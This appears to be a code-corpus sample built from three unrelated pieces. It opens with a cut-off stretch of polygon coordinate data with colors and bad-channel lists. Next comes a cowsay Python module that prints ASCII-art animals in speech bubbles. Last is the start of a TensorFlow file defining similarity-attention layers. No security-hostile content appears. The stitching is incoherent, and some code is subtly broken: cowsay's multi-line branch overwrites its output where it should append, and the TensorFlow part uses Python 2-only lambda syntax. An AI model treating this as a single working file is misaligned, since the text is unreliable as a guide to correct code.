(0.647915267001, -0.240380624251),
(0.642250490872, -0.240488854331),
(0.636576593544, -0.240595817537),
(0.630893704857, -0.240701530812),
(0.625201953577, -0.240806010026),
(0.619501467371, -0.240909270041),
(0.61379237279, -0.241011324765),
(0.608074795251, -0.241112187208),
(0.608124854535, -0.238201081017),
(0.608174276135, -0.235289251871),
(0.608223061095, -0.232376709583),
(0.608271210445, -0.229463463933),
(0.608318725206, -0.226549524669),
(0.608365606382, -0.223634901512),
(0.608411854968, -0.220719604148),
(0.608457471945, -0.217803642236),
(0.608502458281, -0.214887025405),
(0.608546814934, -0.211969763253),
(0.608590542846, -0.209051865349),
(0.608633642949, -0.206133341233),
(0.608676116162, -0.203214200415),
(0.60871796339, -0.20029445238),
(0.608759185527, -0.197374106581),
(0.608799783455, -0.194453172443),
(0.608839758042, -0.191531659366),
(0.608879110144, -0.188609576721),
(0.608917840604, -0.185686933852),
(0.608955950255, -0.182763740075),
(0.608993439915, -0.179840004683),
(0.609030310391, -0.176915736938),
(0.609066562476, -0.173990946082),
(0.609102196951, -0.171065641326),
(0.609137214587, -0.168139831859),
(0.60917161614, -0.165213526846),
(0.609205402354, -0.162286735426),
(0.609238573962, -0.159359466713),
(0.609271131683, -0.1564317298),
(0.609303076224, -0.153503533756),
(0.609334408281, -0.150574887625),
(0.609365128536, -0.147645800431),
(0.615099847591, -0.147585647078),
(0.620826243251, -0.147524833585),
(0.626544189246, -0.147463351981),
(0.632253557801, -0.147401193464),
(0.637954219638, -0.147338348346),
(0.64364604397, -0.147274805997),
(0.649328898505, -0.147210554781),
(0.65500264945, -0.147145581994),
(0.660667161514, -0.147079873799),
(0.666322297914, -0.147013415155),
(0.671967920381, -0.146946189749),
(0.677603889177, -0.146878179921),
(0.683230063097, -0.146809366588),
(0.68884629949, -0.146739729165),
(0.694452454271, -0.146669245483),
(0.700048381941, -0.146597891705),
(0.705633935604, -0.146525642239),
(0.711208966993, -0.146452469644),
(0.716773326491, -0.146378344542),
(0.722326863159, -0.146303235515),
(0.727869424768, -0.146227109011),
(0.733400857824, -0.146149929236),
(0.73892100761, -0.14607165805),
(0.744429718219, -0.145992254857),
(0.749926832595, -0.14591167649),
(0.755412192571, -0.145829877097),
(0.760885638925, -0.145746808017),
(0.766347011415, -0.145662417659),
(0.771796148842, -0.14557665137),
(0.777232889097, -0.14548945131),
(0.782657069222, -0.145400756307),
(0.788068525473, -0.145310501727)]},
31: {'color': 'skyblue',
'polygon': [(0.596197771756, -0.147747435163),
(0.596169756351, -0.150679304635),
(0.596141147159, -0.153610735294),
(0.596111943517, -0.156541718187),
(0.596082144753, -0.159472244338),
(0.596051750182, -0.162402304749),
(0.596020759105, -0.1653318904),
(0.595989170813, -0.168260992245),
(0.595956984584, -0.171189601216),
(0.595924199684, -0.174117708222),
(0.595890815366, -0.177045304146),
(0.595856830872, -0.179972379847),
(0.595822245431, -0.182898926157),
(0.595787058259, -0.185824933886),
(0.595751268562, -0.188750393816),
(0.595714875532, -0.191675296702),
(0.595677878348, -0.194599633275),
(0.595640276177, -0.197523394238),
(0.595602068175, -0.200446570265),
(0.595563253485, -0.203369152006),
(0.595523831235, -0.206291130081),
(0.595483800544, -0.209212495082),
(0.595443160517, -0.212133237574),
(0.595401910247, -0.215053348093),
(0.595360048812, -0.217972817144),
(0.595317575281, -0.220891635206),
(0.595274488708, -0.223809792727),
(0.595230788136, -0.226727280124),
(0.595186472593, -0.229644087786),
(0.595141541097, -0.232560206072),
(0.595095992652, -0.235475625308),
(0.595049826249, -0.238390335793),
(0.595003040867, -0.241304327791),
(0.589258429729, -0.241405089031),
(0.583505861081, -0.241504708082),
(0.5777454541, -0.241603193966),
(0.571977326763, -0.241700555105),
(0.566201595834, -0.24179679936),
(0.560418376867, -0.24189193407),
(0.554627784202, -0.241985966089),
(0.548829930961, -0.242078901823),
(0.543024929057, -0.24217074726),
(0.537212889187, -0.242261508006),
(0.531393920844, -0.242351189311),
(0.525568132315, -0.242439796106),
(0.519735630692, -0.24252733302),
(0.513896521875, -0.242613804416),
(0.508050910583, -0.24269921441),
(0.502198900361, -0.242783566895),
(0.496340593594, -0.242866865567),
(0.490476091511, -0.242949113943),
(0.484605494204, -0.243030315379),
(0.478728900637, -0.243110473095),
(0.472846408658, -0.243189590184),
(0.466958115018, -0.243267669637),
(0.461064115382, -0.243344714353),
(0.455164504346, -0.243420727153),
(0.449259375452, -0.243495710797),
(0.443348821208, -0.243569667994),
(0.437432933102, -0.243642601413),
(0.431511801619, -0.243714513695),
(0.425585516264, -0.243785407463),
(0.419654165577, -0.243855285328),
(0.413717837152, -0.243924149901),
(0.40777661766, -0.243992003797),
(0.407805338869, -0.241045639265),
(0.407833675623, -0.238098609115),
(0.407861628376, -0.235150922205),
(0.407889197571, -0.232202587363),
(0.407916383642, -0.229253613395),
(0.407943187014, -0.226304009076),
(0.407969608103, -0.22335378316),
(0.407995647314, -0.220402944372),
(0.408021305045, -0.217451501414),
(0.408046581684, -0.214499462962),
(0.408071477611, -0.211546837667),
(0.408095993197, -0.208593634158),
(0.408120128805, -0.205639861037),
(0.408143884788, -0.202685526886),
(0.408167261494, -0.19973064026),
(0.408190259261, -0.196775209694),
(0.40821287842, -0.193819243699),
(0.408235119293, -0.190862750764),
(0.408256982196, -0.187905739357),
(0.408278467437, -0.184948217924),
(0.408299575317, -0.181990194889),
(0.40832030613, -0.179031678656),
(0.408340660162, -0.176072677608),
(0.408360637693, -0.17311320011),
(0.408380238997, -0.170153254503),
(0.408399464339, -0.167192849113),
(0.408418313981, -0.164231992244),
(0.408436788176, -0.161270692183),
(0.408454887171, -0.158308957198),
(0.408472611207, -0.15534679554),
(0.408489960521, -0.15238421544),
(0.408506935342, -0.149421225114),
(0.414460968763, -0.149378297906),
(0.420410187231, -0.149334766989),
(0.426354507504, -0.149290632092),
(0.432293845442, -0.149245893022),
(0.438228115982, -0.149200549659),
(0.444157233114, -0.149154601942),
(0.450081109854, -0.149108049869),
(0.455999658224, -0.149060893486),
(0.461912789221, -0.149013132873),
(0.467820412799, -0.148964768139),
(0.473722437842, -0.148915799406),
(0.479618772139, -0.148866226801),
(0.485509322365, -0.148816050438),
(0.491393994053, -0.148765270405),
(0.497272691572, -0.148713886748),
(0.503145318109, -0.148661899455),
(0.50901177564, -0.148609308434),
(0.514871964914, -0.148556113501),
(0.520725785428, -0.148502314349),
(0.526573135412, -0.148447910537),
(0.532413911801, -0.148392901456),
(0.538248010221, -0.148337286312),
(0.54407532497, -0.148281064096),
(0.549895748999, -0.148224233559),
(0.555709173893, -0.148166793179),
(0.561515489857, -0.148108741132),
(0.567314585699, -0.148050075261),
(0.573106348814, -0.14799079304),
(0.578890665172, -0.147930891536),
(0.584667419306, -0.147870367379),
(0.590436494295, -0.147809216714),
(0.596197771756, -0.147747435163)]},
32: {'color': 'skyblue',
'polygon': [(0.394696633387, -0.149424365211),
(0.39467879205, -0.152389107312),
(0.394660590174, -0.155353441224),
(0.39464202756, -0.158317358771),
(0.394623104005, -0.161280851758),
(0.394603819299, -0.164243911975),
(0.394584173229, -0.167206531192),
(0.394564165574, -0.170168701163),
(0.394543796107, -0.173130413623),
(0.394523064596, -0.176091660289),
(0.394501970803, -0.179052432857),
(0.394480514483, -0.182012723007),
(0.394458695386, -0.184972522396),
(0.394436513253, -0.187931822663),
(0.394413967821, -0.190890615426),
(0.394391058819, -0.193848892282),
(0.39436778597, -0.196806644806),
(0.394344148987, -0.199763864555),
(0.39432014758, -0.20272054306),
(0.394295781449, -0.205676671831),
(0.394271050286, -0.208632242358),
(0.394245953779, -0.211587246106),
(0.394220491604, -0.214541674516),
(0.394194663432, -0.217495519008),
(0.394168468923, -0.220448770977),
(0.394141907732, -0.223401421792),
(0.394114979504, -0.226353462801),
(0.394087683875, -0.229304885326),
(0.394060020473, -0.232255680662),
(0.394031988917, -0.235205840081),
(0.394003588818, -0.238155354828),
(0.393974819775, -0.241104216123),
(0.39394568138, -0.24405241516),
(0.387988826095, -0.244113658438),
(0.382027443425, -0.244173901337),
(0.376061615455, -0.244233146634),
(0.370091423476, -0.244291397143),
(0.364116948003, -0.244348655716),
(0.358138268797, -0.244404925244),
(0.352155464887, -0.244460208662),
(0.346168614593, -0.244514508946),
(0.340177795542, -0.244567829116),
(0.334183084698, -0.244620172234),
(0.328184558374, -0.244671541407),
(0.322182292262, -0.244721939783),
(0.31617636145, -0.244771370553),
(0.310166840442, -0.244819836947),
(0.304153803183, -0.244867342234),
(0.298137323079, -0.244913889719),
(0.292117473015, -0.244959482741),
(0.286094325382, -0.245004124671),
(0.280067952089, -0.245047818907),
(0.274038424593, -0.245090568876),
(0.268005813911, -0.245132378023),
(0.261970190647, -0.245173249815),
(0.255931625004, -0.245213187735),
(0.249890186813, -0.245252195273),
(0.243845945542, -0.245290275932),
(0.237798970324, -0.245327433216),
(0.23174932997, -0.245363670627),
(0.22569709299, -0.245398991664),
(0.219642327608, -0.245433399816),
(0.213585101786, -0.24546689856),
(0.207525483234, -0.245499491352),
(0.201463539431, -0.245531181626),
(0.201477818585, -0.242564995643),
(0.201491914957, -0.239598171491),
(0.201505828577, -0.236630717497),
(0.201519559473, -0.23366264197),
(0.201533107671, -0.230693953198),
(0.201546473191, -0.227724659447),
(0.20155965605, -0.224754768965),
(0.201572656261, -0.221784289979),
(0.201585473836, -0.218813230697),
(0.201598108781, -0.215841599308),
(0.201610561102, -0.212869403982),
(0.2016228308, -0.209896652871),
(0.201634917874, -0.206923354109),
(0.201646822321, -0.203949515811),
(0.201658544135, -0.200975146076),
(0.201670083307, -0.198000252984),
(0.201681439828, -0.195024844598),
(0.201692613685, -0.192048928966),
(0.201703604864, -0.189072514119),
(0.201714413349, -0.186095608071),
(0.201725039124, -0.18311821882),
(0.201735482168, -0.180140354351),
(0.201745742461, -0.17716202263),
(0.201755819982, -0.174183231612),
(0.201765714708, -0.171203989235),
(0.201775426614, -0.168224303422),
(0.201784955677, -0.165244182085),
(0.20179430187, -0.16226363312),
(0.201803465167, -0.159282664409),
(0.20181244554, -0.156301283824),
(0.201821242963, -0.153319499222),
(0.201829857408, -0.150337318447),
(0.207903619892, -0.150317575824),
(0.213975054514, -0.150297291683),
(0.22004409477, -0.150276463224),
(0.226110673998, -0.150255087655),
(0.232174725369, -0.150233162194),
(0.238236181864, -0.150210684078),
(0.244294976263, -0.150187650564),
(0.250351041124, -0.15016405894),
(0.256404308768, -0.150139906528),
(0.262454711258, -0.150115190689),
(0.268502180383, -0.150089908828),
(0.274546647639, -0.150064058401),
(0.280588044208, -0.15003763692),
(0.286626300941, -0.150010641954),
(0.292661348333, -0.14998307114),
(0.298693116511, -0.149954922183),
(0.304721535203, -0.149926192862),
(0.310746533725, -0.149896881033),
(0.316768040954, -0.149866984636),
(0.322785985312, -0.149836501693),
(0.328800294736, -0.149805430318),
(0.334810896663, -0.149773768717),
(0.340817718003, -0.149741515187),
(0.346820685117, -0.149708668125),
(0.352819723794, -0.149675226028),
(0.358814759226, -0.149641187489),
(0.364805715988, -0.149606551206),
(0.370792518008, -0.14957131598),
(0.376775088549, -0.149535480712),
(0.38275335018, -0.149499044408),
(0.388727224756, -0.149462006172),
(0.394696633387, -0.149424365211)]},
33: {'bad_channels': [3, 4],
'color': 'red',
'polygon': [(0.187776696458, -0.150607165433),
(0.18776770607, -0.153590131409),
(0.187758545238, -0.15657270112),
(0.187749213998, -0.159554866732),
(0.187739712387, -0.1625366204),
(0.187730040444, -0.165517954266),
(0.187720198203, -0.168498860458),
(0.1877101857, -0.171479331092),
(0.187700002971, -0.17445935827),
(0.18768965005, -0.177438934082),
(0.18767912697, -0.180418050601),
(0.187668433765, -0.183396699889),
(0.187657570465, -0.18637487399),
(0.187646537101, -0.189352564936),
(0.187635333702, -0.192329764742),
(0.187623960297, -0.195306465409),
(0.187612416911, -0.19828265892),
(0.187600703568, -0.201258337244),
(0.187588820293, -0.204233492334),
(0.187576767105, -0.207208116123),
(0.187564544024, -0.210182200531),
(0.187552151066, -0.213155737459),
(0.187539588247, -0.216128718789),
(0.187526855578, -0.219101136388),
(0.18751395307, -0.222072982102),
(0.187500880728, -0.225044247762),
(0.187487638559, -0.228014925177),
(0.187474226562, -0.230985006139),
(0.187460644736, -0.233954482419),
(0.187446893077, -0.23692334577),
(0.187432971575, -0.239891587925),
(0.18741888022, -0.242859200596),
(0.187404618995, -0.245826175474),
(0.1813354856, -0.245852843833),
(0.175264315409, -0.245878622804),
(0.169191174943, -0.24590351565),
(0.163116130592, -0.245927525584),
(0.157039248622, -0.245950655761),
(0.150960595201, -0.245972909278),
(0.1448802364, -0.245994289165),
(0.138798238217, -0.246014798386),
(0.132714666581, -0.246034439829),
(0.12662958737, -0.246053216307),
(0.120543066419, -0.246071130552),
(0.114455169534, -0.246088185209),
(0.108365962504, -0.246104382835),
(0.102275511106, -0.246119725897),
(0.0961838811234, -0.246134216762),
(0.090091138348, -0.246147857701),
(0.0839973485942, -0.246160650879),
(0.0779025777063, -0.246172598357),
(0.0718068915676, -0.246183702088),
(0.0657103561079, -0.24619396391),
(0.0596130373119, -0.24620338555),
(0.0535150012265, -0.246211968616),
(0.0474163139672, -0.246219714596),
(0.0413170417257, -0.246226624858),
(0.0352172507752, -0.246232700644),
(0.029117007477, -0.246237943073),
(0.0230163782855, -0.246242353134),
(0.0169154297535, -0.246245931687),
(0.0108142285374, -0.246248679464),
(0.00471284140113, -0.246250597063),
(-0.00138866477951, -0.246251684949),
(-0.00749022301292, -0.246251943455),
(-0.00749062418694, -0.243279686236),
(-0.0074910204973, -0.240306793531),
(-0.00749141199938, -0.237333273502),
(-0.00749179874882, -0.234359134297),
(-0.00749218080159, -0.231384384046),
(-0.00749255821387, -0.228409030867),
(-0.00749293104204, -0.225433082861),
(-0.00749329934251, -0.222456548115),
(-0.00749366317177, -0.219479434703),
(-0.00749402258637, -0.216501750682),
(-0.0074943776427, -0.213523504097),
(-0.00749472839703, -0.210544702979),
(-0.00749507490553, -0.207565355345),
(-0.00749541722408, -0.204585469199),
(-0.00749575540829, -0.201605052531),
(-0.00749608951347, -0.19862411332),
(-0.00749641959453, -0.19564265953),
(-0.00749674570591, -0.192660699116),
(-0.00749706790165, -0.189678240017),
(-0.00749738623523, -0.186695290162),
(-0.0074977007595, -0.183711857468),
(-0.00749801152679, -0.180727949841),
(-0.00749831858874, -0.177743575175),
(-0.00749862199626, -0.174758741353),
(-0.00749892179957, -0.171773456246),
(-0.00749921804805, -0.168787727716),
(-0.00749951079032, -0.165801563615),
(-0.00749980007416, -0.162814971782),
(-0.00750008594633, -0.159827960048),
(-0.00750036845284, -0.156840536235),
(-0.00750064763858, -0.153852708152),
(-0.00750092354758, -0.150864483603),
(-0.00138730045512, -0.15086403347),
(0.00472626736655, -0.150863103869),
(0.0108397124665, -0.150861694614),
(0.0169529675116, -0.150859805391),
(0.0230659652855, -0.150857435762),
(0.0291786386867, -0.150854585164),
(0.0352909207265, -0.150851252913),
(0.0414027445267, -0.150847438201),
(0.0475140433172, -0.150843140102),
(0.0536247504324, -0.150838357573),
(0.0597347993085, -0.150833089453),
(0.0658441234792, -0.150827334471),
(0.0719526565719, -0.150821091242),
(0.0780603323029, -0.150814358276),
(0.0841670844731, -0.150807133975),
(0.0902728469618, -0.150799416643),
(0.0963775537219, -0.150791204483),
(0.102481138773, -0.150782495602),
(0.108583536196, -0.15077328802),
(0.114684680123, -0.150763579665),
(0.120784504736, -0.150753368385),
(0.126882944253, -0.150742651948),
(0.13297993292, -0.150731428045),
(0.139075405009, -0.150719694301),
(0.145169294799, -0.150707448272),
(0.151261536575, -0.150694687455),
(0.157352064613, -0.150681409291),
(0.16344081317, -0.15066761117),
(0.169527716473, -0.150653290437),
(0.175612708711, -0.150638444395),
(0.181695724016, -0.150623070314),
(0.187776696458, -0.150607165433)]},
34: {'color': 'violet',
'polygon': [(-0.0109948898159, -0.150885055847),
(-0.0109926227084, -0.153873270396),
(-0.0109903493576, -0.156861088346),
(-0.0109880697254, -0.159848501893),
(-0.010985783772, -0.162835503225),
(-0.0109834914572, -0.16582208452),
(-0.0109811927395, -0.168808237945),
(-0.0109788875766, -0.171793955659),
(-0.0109765759254, -0.174779229809),
(-0.010974257742, -0.177764052533),
(-0.0109719329815, -0.180748415958),
(-0.0109696015986, -0.183732312199),
(-0.0109672635468, -0.186715733361),
(-0.0109649187794, -0.189698671538),
(-0.0109625672488, -0.192681118811),
(-0.0109602089068, -0.195663067252),
(-0.0109578437049, -0.198644508917),
(-0.0109554715938, -0.201625435854),
(-0.0109530925239, -0.204605840097),
| |
<reponame>rashid-nhm/cowsay<filename>cowsay.py
#!/usr/bin/env python3
import random
from enum import Enum
ACKNOWLEDGEMENTS = """
cowsay for GNU/Linux was initially written in perl by <NAME> (<EMAIL>), with suggestions from
<NAME> (<EMAIL>) and contributions from <NAME> (<EMAIL>).
This code was originally written by: <NAME>
https://pypi.org/project/cowsay/
https://github.com/VaasuDevanS/cowsay-python
All base characters, newline logic is from his code!
The code was updated by: <NAME>
https://github.com/rashid-nhm/cowsay
"""
__author__ = "<NAME>"
__name__ = "cowsay"
__license__ = "MIT"
__version__ = 2.0
max_line_len = 50
class CowString(str):
def __init__(self, value):
super().__init__()
def __repr__(self):
return super().__str__()
class Characters(Enum):
beavis = """
__------~~-,
,' ,
/ \\
/ :
| '
| |
| |
| _-- |
_| =-. .-. ||
o|/o/ _. |
/ ~ \\ |
(____\@) ___~ |
|_===~~~.` |
_______.--~ |
\\________ |
\\ |
__/-___-- -__
/ _ \\
"""
cheese = """
/ \\_/ |
| ||
| ||
| ###\\ /### | |
| 0 \\/ 0 | |
/| | |
/ | < |\\ \\
| /| | | |
| | \\_______/ | | |
| | | / /
/|| /|||
----------------|
| | | |
*** ***
/___\\ /___\\
"""
daemon = """
/- _ `-/ '
(/\\/ \\ \\ /\\
/ / | ` \\
O O ) / |
`-^--'`< '
(_.) _ ) /
`.___/` /
`-----' /
<----. __ / __ \\
<----|====O)))==) \\) /====
<----' `--' `.__,' \\
| |
\\ /
______( (_ / \\______
,' ,-----' | \\
`--{__________) \\/
"""
cow = """
^__^
(oo)\_______
(__)\ )\/\
||----w |
|| ||
"""
dragon = """
/ \\ //\\
|\\___/| / \\// \\\\
/0 0 \\__ / // | \\ \\
/ / \\/_/ // | \\ \\
\@_^_\@'/ \\/_ // | \\ \\
//_^_/ \\/_ // | \\ \\
( //) | \\/// | \\ \\
( / /) _|_ / ) // | \\ _\\
( // /) '/,_ _ _/ ( ; -. | _ _\\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\\ / ~-. _ .-~ .-~^-. \\
(( /// )) `. { } / \\ \\
(( / )) .----~-.\\ \\-' .~ \\ `. \\^-.
///.----..> \\ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
"""
ghostbusters = """
__---__
_- /--______
__--( / \\ )XXXXXXXXXXX\\v.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\\
/XXXXX( )--_ XXXXXXXXXXX\\
/XXXXX/ ( O ) XXXXXX \\XXXXX\\
XXXXX/ / XXXXXX \\__ \\XXXXX
XXXXXX__/ XXXXXX \\__---->
---___ XXX__/ XXXXXX \\__ /
\\- --__/ ___/\\ XXXXXX / ___--/=
\\-\\ ___/ XXXXXX '--- XXXXXX
\\-\\/XXX\\ XXXXXX /XXXXX
\\XXXXXXXXX \\ /XXXXX/
\\XXXXXX > _/XXXXX/
\\XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
\\XXXXXXXXXXXXXXXXXXXXXXXXXX/
""VXXXXXXXXXXXXXXXXXXV""
"""
kitty = """
("`-' '-/") .___..--' ' "`-._
` *_ * ) `-. ( ) .`-.__. `)
(_Y_.) ' ._ ) `._` ; `` -. .-'
_.. `--'_..-_/ /--' _ .' ,4
( i l ),-'' ( l i),' ( ( ! .-'
"""
meow = """
_ ___.--'''`--''//-,-_--_.
\\`"' ` || \\\\ \\ \\\\/ / // / ,-\\\\`,_
/'` \\ \\ || Y | \\|/ / // / - |__ `-,
/\@"\\ ` \\ `\\ | | ||/ // | \\/ \\ `-._`-,_.,
/ _.-. `.-\\,___/\\ _/|_/_\\_\\/|_/ | `-._._)
`-'``/ / | // \\__/\\__ / \\__/ \\
`-' /-\\/ | -| \\__ \\ |-' |
__/\\ / _/ \\/ __,-' ) ,' _|'
(((__/(((_.' ((___..-'((__,'
"""
milk = """
____________
|__________|
/ /\\
/ / \\
/___________/___/|
| | |
| ==\\ /== | |
| O O | \\ \\ |
| < | \\ \\|
/| | \\ \\
/ | \\_____/ | / /
/ /| | / /|
/||\\| | /||\\/
-------------|
| | | |
<__/ \\__>
"""
stegosaurus = """
/ `. .' "
.---. < > < > .---.
| \\ \\ - ~ ~ - / / |
_____ ..-~ ~-..-~
| | \\~~~\\.' `./~~~/
--------- \\__/ \\__/
.' O \\ / / \\ "
(_____, `._.' | } \\/~~~/
`----. / } | / \\__/
`-. | / | / `. ,~~|
~-.__| /_ - ~ ^| /- _ `..-'
| / | / ~-. `-. _ _ _
|_____| |_____| ~ - . _ _ _ _ _>
"""
stimpy = """
. _ .
|\\_|/__/|
/ / \\/ \\ \\
/__|O||O|__ \\
|/_ \\_/\\_/ _\\ |
| | (____) | ||
\\/\\___/\\__/ //
(_/ ||
| ||
| ||\\
\\ //_/
\\______//
__ || __||
(____(____)
"""
turkey = """
,+*^^*+___+++_
,*^^^^ )
_+* ^**+_
+^ _ _++*+_+++_, )
_+^^*+_ ( ,+*^ ^ \\+_ )
{ ) ( ,( ,_+--+--, ^) ^\\
{ (\@) } f ,( ,+-^ __*_*_ ^^\\_ ^\\ )
{:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) /
( / ( ( ,___ ^*+_+* ) < < \\
U _/ ) *--< ) ^\\-----++__) ) ) )
( ) _(^)^^)) ) )\\^^^^^))^*+/ / /
( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^
( ,/ (^))^)) ) ) ))^^^^^^^))^^) _)
*+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^
\\ \\_)^)_)) ))^^^^^^^^^^))^^^^)
(_ ^\\__^^^^^^^^^^^^))^^^^^^^)
^\\___ ^\\__^^^^^^))^^^^^^^^)\\\\
^^^^^\\uuu/^^\\uuu/^^^^\\^\\^\\^\\^\\^\\^\\^\\
___) >____) >___ ^\\_\\_\\_\\_\\_\\_\\)
^^^//\\\\_^^//\\\\_^ ^(\\_\\_\\_\\)
^^^ ^^ ^^^ ^
"""
turtle = """
___-------___
_-~~ ~~-_
_-~ /~-_
/^\\__/^\\ /~ \\ / \\
/| O|| O| / \\_______________/ \\
| |___||__| / / \\ \\
| \\ / / \\ \\
| (_______) /______/ \\_________ \\
| / / \\ / \\
\\ \\^\\\\ \\ / \\ /
\\ || \\______________/ _-_ //\\__//
\\ ||------_-~~-_ ------------- \\ --/~ ~\\ || __/
~-----||====/~ |==================| |/~~~~~
(_(__/ ./ / \\_\\ \\.
(_(___/ \\_____)_)
"""
tux = """
.--.
|o_o |
|:_/ |
// \\ \\
(| | )
/'\\_ _/`\\
\\___)=(___/
"""
def character_names():
return [character.name for character in Characters]
def character_functions():
return [beavis, cheese, daemon, cow, dragon,
ghostbusters, kitty, meow, milk, stegosaurus,
stimpy, turkey, turtle, tux]
def process_string(func):
def string_processor(txt, *args, **kwargs):
txt = str(txt)
lines = [i.strip() for i in txt.split("\n") if len(i.strip()) != 0]
if len(lines) == 1:
line_len = len(lines[0])
if line_len <= max_line_len:
ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n< {lines[0]}{' '*(line_len - len(lines[0]) + 1)}>\n "\
f"{'='*line_len}\n"
else:
lines = list("".join(lines[0]))
for i, line in enumerate(lines):
if i and i % max_line_len == 0:
lines.insert(i, "\n")
return string_processor("".join(lines), *args, **kwargs)
else:
line_len = len(max(lines, key=len))
if all(len(line) <= max_line_len for line in lines):
ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n"
for line in lines:
ret_txt = f"| {line}{' '*(line_len-len(line)+1)}|\n"
ret_txt += f" \\{' '*line_len}/\n {'='*line_len}\n"
else:
new_lines = []
for line in lines:
if len(line) > max_line_len:
joined_line = list("".join(line))
for i, char in enumerate(joined_line):
if i and i % max_line_len == 0:
joined_line.insert(i, "\n")
new_lines.append("".join(joined_line))
else:
new_lines.append(line + "\n")
return string_processor("".join(new_lines), *args, **kwargs)
return func(ret_txt, *args, max_line=line_len, **kwargs)
return string_processor
def apologize_if_fail_for(character_name):
def apologize(func):
def apology(*args, **kwargs):
try:
return func(*args, **kwargs)
except:
if not str(args[0]).strip():
return func(f"You didn't actually give {character_name} anything to say...")
return func(f"I was not able to parse and say what you wanted. Please give {character_name} something "
f"easier or different")
return apology
return apologize
@process_string
def __say(txt, base_character, max_line=max_line_len, left_pad=0):
for i in range(5, 9):
txt += " " * (max_line + i) + "\\\n"
base_char_lines = [line for line in base_character.value.split("\n") if len(line) != 0]
for line in base_char_lines:
txt += " " * (max_line + left_pad) + line + "\n"
return CowString(txt)
@apologize_if_fail_for("beavis")
def beavis(txt):
return __say(txt, Characters.beavis, left_pad=7)
@apologize_if_fail_for("cheese")
def cheese(txt):
return __say(txt, Characters.cheese, left_pad=3)
@apologize_if_fail_for("daemon")
def daemon(txt):
return __say(txt, Characters.daemon, left_pad=-2)
@apologize_if_fail_for("cow")
def cow(txt):
return __say(txt, Characters.cow, left_pad=10)
@apologize_if_fail_for("dragon")
def dragon(txt):
return __say(txt, Characters.dragon, left_pad=0)
@apologize_if_fail_for("ghostbusters")
def ghostbusters(txt):
return __say(txt, Characters.ghostbusters, left_pad=0)
@apologize_if_fail_for("kitty")
def kitty(txt):
return __say(txt, Characters.kitty, left_pad=3)
@apologize_if_fail_for("meow")
def meow(txt):
return __say(txt, Characters.meow, left_pad=3)
@apologize_if_fail_for("milk")
def milk(txt):
return __say(txt, Characters.milk, left_pad=3)
@apologize_if_fail_for("stegosaurus")
def stegosaurus(txt):
return __say(txt, Characters.stegosaurus, left_pad=0)
@apologize_if_fail_for("stimpy")
def stimpy(txt):
return __say(txt, Characters.stimpy, left_pad=7)
@apologize_if_fail_for("turkey")
def turkey(txt):
return __say(txt, Characters.turkey, left_pad=2)
@apologize_if_fail_for("turtle")
def turtle(txt):
return __say(txt, Characters.turtle, left_pad=5)
@apologize_if_fail_for("tux")
def tux(txt):
return __say(txt, Characters.tux, left_pad=5)
@apologize_if_fail_for("me")
def say(txt):
return __say(txt, Characters.cow, left_pad=10)
def | |
<gh_stars>0
# -*- coding=utf-8 -*-
# weakly label version
import tensorflow as tf
from OHEM import OHNM_batch
import numpy as np
slim = tf.contrib.slim
MODEL_TYPE_vgg16 = 'vgg16'
MODEL_TYPE_vgg16_no_dilation = 'vgg16_no_dilation'
dice_coff = 0.5
ms_flag = False
FUSE_TYPE_cascade_conv1x1_upsample_sum = 'cascade_conv1x1_upsample_sum'
FUSE_TYPE_cascade_conv1x1_128_upsamle_sum_conv1x1_2 = \
'cascade_conv1x1_128_upsamle_sum_conv1x1_2'
FUSE_TYPE_cascade_conv1x1_128_upsamle_concat_conv1x1_2 = \
'cascade_conv1x1_128_upsamle_concat_conv1x1_2'
skip_connection_setting = {
'vgg16': ['conv1_2','conv2_2', 'conv3_3', 'conv4_3', 'fc7'],
'res50': [],
}
def compute_EDM_tf(tensor):
'''
计算tensor的欧式距离
:param tensor: N*C
:return: N*N
'''
shape = tensor.get_shape().as_list()
G = tf.matmul(tensor, tf.transpose(tensor, perm=[1, 0]))
diag_tensor = tf.expand_dims(tf.diag_part(G), axis=0)
H = tf.tile(diag_tensor, [shape[0], 1])
D = tf.sqrt(H + tf.transpose(H, perm=[1, 0]) - 2. * G)
return D
class GlobalSimilarityAttention:
def __init__(self, feature_map, name, arg_sc):
'''
:param feature_map: N * H * W * C
:param name:
:param arg_sc:
'''
with tf.variable_scope(name):
with slim.arg_scope(arg_sc):
shape = feature_map.get_shape().as_list()
feature_map = tf.reshape(feature_map, [shape[0], -1, shape[-1]])
distance = tf.map_fn(lambda feature: compute_EDM_tf(feature), feature_map)
print('distance is ', distance)
alpha = tf.sigmoid(distance)
print('the similarity matrix is ', alpha)
print('the feature_map is ', feature_map)
o = tf.matmul(alpha, feature_map)
print('delta feature is ', o)
beta = tf.get_variable('beta', [], dtype=tf.float32, initializer=tf.constant_initializer(0.0))
feature_map = beta * o + feature_map
feature_map = tf.reshape(feature_map, shape)
self.output_feature_map = feature_map
class LocalSimilarityAttention:
def __init__(self, feature_map, k, name, arg_sc):
with tf.variable_scope(name):
with slim.arg_scope(arg_sc):
shape = feature_map.get_shape().as_list()
cropped_feature_map = feature_map[:, k//2:shape[1]-k//2, k//2:shape[2]-k//2, :]
cropped_feature_map = tf.reshape(cropped_feature_map, [shape[0], -1, shape[-1]])
patches = tf.extract_image_patches(feature_map, ksizes=[1, k, k, 1], strides=[1, 1, 1, 1],
rates=[1, 1, 1, 1], padding='VALID')
patches_shape = patches.get_shape().as_list()
patches = tf.reshape(patches, [patches_shape[0], -1, k * k, shape[-1]])
patches = tf.transpose(patches, perm=[0, 2, 1, 3])
print('the patches is ', patches)
print('the cropped_feature_map is ', cropped_feature_map)
# 计算每个pixel和相邻的pixel 特征之间的距离
distance = tf.map_fn(
lambda (feature_example, patch_example): tf.map_fn(
lambda patch_neighbor: tf.reduce_sum((feature_example - patch_neighbor) ** 2, axis=-1),
patch_example),
[cropped_feature_map, patches], dtype=tf.float32)
print('distance is ', distance)
alpha = tf.sigmoid(distance)
o = tf.reduce_sum(patches * tf.expand_dims(alpha, axis=3), axis=1)
